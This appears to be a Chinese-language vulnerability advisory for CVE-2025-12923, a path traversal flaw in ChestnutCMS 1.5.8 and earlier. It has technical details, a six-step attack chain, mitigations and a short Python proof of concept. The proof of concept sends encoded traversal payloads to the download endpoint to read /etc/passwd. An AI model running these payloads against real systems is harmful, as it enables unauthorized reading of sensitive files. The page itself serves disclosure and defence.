CVE-2025-12923 CVSS 2.7 低危

CVE-2025-12923 ChestnutCMS路径遍历漏洞导致任意文件读取

披露日期: 2025-11-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-12923

漏洞类型

路径遍历

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

liweiyi ChestnutCMS

漏洞概述

CVE-2025-12923是存在于liweiyi ChestnutCMS中的一项路径遍历漏洞。该漏洞影响ChestnutCMS 1.5.8及以下版本，存在于/dev-api/common/download接口的resourceDownload函数中。攻击者可以通过操纵path参数实现目录遍历，从而读取服务器上的任意文件。由于该漏洞可远程利用且已公开披露，具有一定的安全风险。攻击者利用此漏洞可以获取系统敏感配置文件、源代码、凭据文件等敏感信息，可能导致进一步的安全威胁。CVSS评分2.7，评级为低危，主要因为需要高权限认证才能利用，但机密性影响为低级别。

技术细节

该漏洞位于ChestnutCMS的/dev-api/common/download接口的resourceDownload函数中。漏洞根源在于程序对用户输入的path参数缺乏充分的路径验证和过滤。攻击者可以通过构造特殊的路径字符串（如../../../etc/passwd）来绕过路径限制，访问服务器上本不应被访问的文件。漏洞利用条件包括：1）攻击者需要拥有系统的高权限账户；2）能够访问/dev-api/common/download接口；3）通过HTTP请求参数传递恶意路径。由于该接口未对路径进行规范化处理和安全过滤，攻击者可以使用相对路径或绝对路径访问任意文件。成功利用后可读取服务器配置文件、密钥文件、用户数据等敏感信息。

攻击链分析

STEP 1

步骤1

攻击者识别目标站点使用ChestnutCMS版本<=1.5.8

STEP 2

步骤2

攻击者获取系统高权限账户（管理员权限）

STEP 3

步骤3

访问/dev-api/common/download接口

STEP 4

步骤4

构造路径遍历payload，如../../../etc/passwd

STEP 5

步骤5

发送恶意请求读取服务器敏感文件

STEP 6

步骤6

获取敏感信息后可进行横向移动或进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-12923 Path Traversal PoC for ChestnutCMS
# Target: /dev-api/common/download?path=../../../etc/passwd

target_url = "http://target.com/dev-api/common/download"

# Path traversal payload to read /etc/passwd
payloads = [
    "../../../etc/passwd",
    "..\..\..\etc\passwd",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
]

for payload in payloads:
    params = {"path": payload}
    try:
        response = requests.get(target_url, params=params, timeout=10)
        if response.status_code == 200 and "root:" in response.text:
            print(f"[+] Vulnerable! File content:\n{response.text}")
        else:
            print(f"[-] Payload failed: {payload}")
    except requests.RequestException as e:
        print(f"[-] Request error: {e}")

影响范围

liweiyi ChestnutCMS <= 1.5.8

防御指南

临时缓解措施

临时缓解措施：1）限制/dev-api/common/download接口的访问，仅允许受信任的IP地址访问；2）配置Web服务器规则，阻止包含../等路径遍历字符的请求；3）监控访问日志，及时发现异常文件读取行为；4）定期检查系统文件权限，确保敏感文件最小化访问权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12923
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12923
3 Details https://www.cvedetails.com/cve/CVE-2025-12923/
4 VulDB https://vuldb.com/cve/CVE-2025-12923
5 Link https://github.com/Huu1j/CVE/blob/main/chestnutcms%20Arbitrary%20File%20Read.md
6 Link https://vuldb.com/?ctiid.331643
7 Link https://vuldb.com/?id.331643
8 Link https://vuldb.com/?submit.681032

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表